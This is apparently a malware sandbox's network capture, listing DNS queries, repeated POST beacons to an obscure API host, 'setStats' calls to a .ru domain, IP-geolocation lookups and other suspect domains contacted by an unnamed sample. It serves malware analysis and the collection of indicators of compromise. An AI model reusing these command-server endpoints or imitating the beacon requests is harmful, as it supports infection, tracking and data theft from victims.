User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:08 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:09 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:09 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:09 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:09 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:10 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:10 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:11 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:11 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:11 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:11 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:11 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:11 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:12 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR
DNS

www.iyiqian.com

Remote address:

8.8.8.8:53

Request

www.iyiqian.com

IN A

Response

www.iyiqian.com

IN A

34.143.166.163
DNS

www.iyiqian.com

Remote address:

8.8.8.8:53

Request

www.iyiqian.com

IN A

Response

www.iyiqian.com

IN A

34.143.166.163
DNS

www.iyiqian.com

Remote address:

8.8.8.8:53

Request

www.iyiqian.com

IN A

Response
DNS

www.facebook.com

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.221.35
DNS

secure.facebook.com

Remote address:

8.8.8.8:53

Request

secure.facebook.com

IN A

Response

secure.facebook.com

IN CNAME

secure.c10r.facebook.com

secure.c10r.facebook.com

IN A

163.70.147.4
GET

http://www.iyiqian.com/

Remote address:

34.143.166.163:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.iyiqian.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 30 Dec 2023 17:51:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.www.iyiqian.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=www.iyiqian.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=12e4ff322568ca3994d520e2c0ccdda0|89.149.23.59|1703958663|1703958663|0|1|0; path=/; domain=.iyiqian.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=89.149.23.59; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

static.xx.fbcdn.net

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

163.70.147.23
DNS

static.xx.fbcdn.net

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A
DNS

35.221.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.221.240.157.in-addr.arpa

IN PTR

Response

35.221.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-lhr8facebookcom
DNS

4.147.70.163.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.147.70.163.in-addr.arpa

IN PTR

Response

4.147.70.163.in-addr.arpa

IN PTR

edge-secure-shv-01-lhr6facebookcom
DNS

227.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.179.250.142.in-addr.arpa

IN PTR

Response

227.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f31e100net
DNS

74.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.169.217.172.in-addr.arpa

IN PTR

Response

74.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f101e100net
DNS

23.147.70.163.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.147.70.163.in-addr.arpa

IN PTR

Response

23.147.70.163.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-lhr6fbcdnnet
DNS

23.147.70.163.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.147.70.163.in-addr.arpa

IN PTR
DNS

163.166.143.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

163.166.143.34.in-addr.arpa

IN PTR

Response

163.166.143.34.in-addr.arpa

IN PTR

16316614334bcgoogleusercontentcom
DNS

163.166.143.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

163.166.143.34.in-addr.arpa

IN PTR
DNS

48.169.248.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.169.248.13.in-addr.arpa

IN PTR

Response

48.169.248.13.in-addr.arpa

IN PTR

a904c694c05102f30awsglobalacceleratorcom
DNS

48.169.248.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.169.248.13.in-addr.arpa

IN PTR
DNS

content-autofill.googleapis.com

Remote address:

8.8.8.8:53

Request

content-autofill.googleapis.com

IN A

Response

content-autofill.googleapis.com

IN A

142.250.200.42

content-autofill.googleapis.com

IN A

142.250.200.10

content-autofill.googleapis.com

IN A

216.58.201.106

content-autofill.googleapis.com

IN A

216.58.204.74

content-autofill.googleapis.com

IN A

172.217.169.10

content-autofill.googleapis.com

IN A

142.250.179.234

content-autofill.googleapis.com

IN A

142.250.180.10

content-autofill.googleapis.com

IN A

142.250.187.202

content-autofill.googleapis.com

IN A

142.250.187.234

content-autofill.googleapis.com

IN A

172.217.16.234

content-autofill.googleapis.com

IN A

142.250.178.10
DNS

facebook.com

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

163.70.147.35
DNS

facebook.com

Remote address:

8.8.8.8:53

Request

facebook.com

IN A
DNS

facebook.com

Remote address:

8.8.8.8:53

Request

facebook.com

IN A
DNS

42.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

42.200.250.142.in-addr.arpa

IN PTR

Response

42.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f101e100net
DNS

t.me

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
DNS

ninhaine.com

Remote address:

8.8.8.8:53

Request

ninhaine.com

IN TXT

Response
DNS

ninhaine.com

Remote address:

8.8.8.8:53

Request

ninhaine.com

IN TXT
DNS

2makestorage.com

Remote address:

8.8.8.8:53

Request

2makestorage.com

IN TXT

Response
DNS

2makestorage.com

Remote address:

8.8.8.8:53

Request

2makestorage.com

IN TXT
DNS

2makestorage.com

Remote address:

8.8.8.8:53

Request

2makestorage.com

IN TXT
DNS

99.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.167.154.149.in-addr.arpa

IN PTR

Response
DNS

nisdably.com

Remote address:

8.8.8.8:53

Request

nisdably.com

IN TXT

Response

nisdably.com

IN TXT

.v=spf1 include:_incspfcheck.mailspike.net ?all
DNS

nisdably.com

Remote address:

8.8.8.8:53

Request

nisdably.com

IN TXT

Response
DNS

nisdably.com

Remote address:

8.8.8.8:53

Request

nisdably.com

IN TXT

Response
DNS

nisdably.com

Remote address:

8.8.8.8:53

Request

nisdably.com

IN TXT
DNS

aucmoney.com

Remote address:

8.8.8.8:53

Request

aucmoney.com

IN A

Response
DNS

thegymmum.com

Remote address:

8.8.8.8:53

Request

thegymmum.com

IN A

Response
DNS

fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com

Remote address:

8.8.8.8:53

Request

fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com

IN TXT

Response
DNS

atvcampingtrips.com

Remote address:

8.8.8.8:53

Request

atvcampingtrips.com

IN A

Response
DNS

server2.ninhaine.com

Remote address:

8.8.8.8:53

Request

server2.ninhaine.com

IN A

Response
DNS

kuapakualaman.com

Remote address:

8.8.8.8:53

Request

kuapakualaman.com

IN A

Response
DNS

kuapakualaman.com

Remote address:

8.8.8.8:53

Request

kuapakualaman.com

IN A
DNS

kuapakualaman.com

Remote address:

8.8.8.8:53

Request

kuapakualaman.com

IN A
DNS

renatazarazua.com

Remote address:

8.8.8.8:53

Request

renatazarazua.com

IN A

Response
DNS

renatazarazua.com

Remote address:

8.8.8.8:53

Request

renatazarazua.com

IN A
DNS

nasufmutlu.com

Remote address:

8.8.8.8:53

Request

nasufmutlu.com

IN A

Response
DNS

server2.ninhaine.com

Remote address:

8.8.8.8:53

Request

server2.ninhaine.com

IN A

Response
DNS

spolaect.info

Remote address:

8.8.8.8:53

Request

spolaect.info

IN A
DNS

spolaect.info

Remote address:

8.8.8.8:53

Request

spolaect.info

IN A
DNS

wfsdragon.ru

Remote address:

8.8.8.8:53

Request

wfsdragon.ru

IN A

Response

wfsdragon.ru

IN A

104.21.5.208

wfsdragon.ru

IN A

172.67.133.215
GET

http://wfsdragon.ru/api/setStats.php

Remote address:

104.21.5.208:80

Request

GET /api/setStats.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: wfsdragon.ru

Response

HTTP/1.1 200 OK

Date: Sat, 30 Dec 2023 17:51:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xMf9hJsjRB1ceStMTNv6T1DvX3AXRudPctCToORUoaMW3RBo6wuUJ3xPphBZUroDNkf5KT1Sr6v68o8wMBHEVJFPhPQ0VPx35m6W7WGjaT5zNXO2hoKUvDawAO2B%2FIY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 83dc21916cfb0691-LHR
alt-svc: h3=":443"; ma=86400
DNS

208.5.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.5.21.104.in-addr.arpa

IN PTR

Response
GET

http://wfsdragon.ru/api/setStats.php

Remote address:

104.21.5.208:80

Request

GET /api/setStats.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: wfsdragon.ru

Response

HTTP/1.1 200 OK

Date: Sat, 30 Dec 2023 17:51:31 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kKWFLyEIXwIJAxgFamSjC7fmRYIxxSkNckMb9bQLZAVopNtS0XBZjprkzTsiwNXAhK5AuX4EvyWlJ9vlpijInQTbK0cigYud7az96DK9MEMznYov3plzAh%2Bv3943aZA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 83dc219c5f45527f-LHR
alt-svc: h3=":443"; ma=86400
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

Remote address:

8.8.8.8:53

Response

199.59.243.225:443

www.listincode.com

tls

1.2kB
5.0kB
16
12
34.117.186.192:443

ipinfo.io

tls

1.1kB
6.8kB
11
11
172.67.132.113:443

iplogger.org

tls

918 B
6.2kB
10
10
37.0.8.235:80

260 B
5
208.95.112.1:80

http://ip-api.com/json/

http

826 B
662 B
7
4

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
34.117.186.192:443

ipinfo.io

tls

1.0kB
6.8kB
11
11
138.91.171.81:80

52 B
1
172.67.132.113:443

iplogger.org

tls

976 B
1.8kB
8
6
186.2.171.3:80

http://186.2.171.3/seemorebty/il.php?e=md9_1sjm

http

1.0kB
959 B
5
3

HTTP Request

GET http://186.2.171.3/seemorebty/il.php?e=md9_1sjm

HTTP Response

301
186.2.171.3:443

tls

1.0kB
1.9kB
7
6
172.67.132.113:443

iplogger.org

tls

2.5kB
10.7kB
21
20
2.56.59.245:80

260 B
5
173.222.13.40:80

http://x2.i.lencr.org/

http

397 B
1.7kB
6
5

HTTP Request

GET http://x2.i.lencr.org/

HTTP Response

200
163.70.147.35:443

www.facebook.com

tls

7.5kB
224.3kB
118
169
173.222.13.40:80

http://x2.c.lencr.org/

http

500 B
721 B
6
3

HTTP Request

GET http://x2.c.lencr.org/

HTTP Response

200
96.17.179.201:80

http://e1.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D

http

521 B
862 B
6
3

HTTP Request

GET http://e1.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D

HTTP Response

200
172.67.132.113:443

iplogger.org

tls

1.6kB
6.6kB
16
10
185.107.56.199:443

humisnee.com

tls

1.6kB
5.3kB
15
12
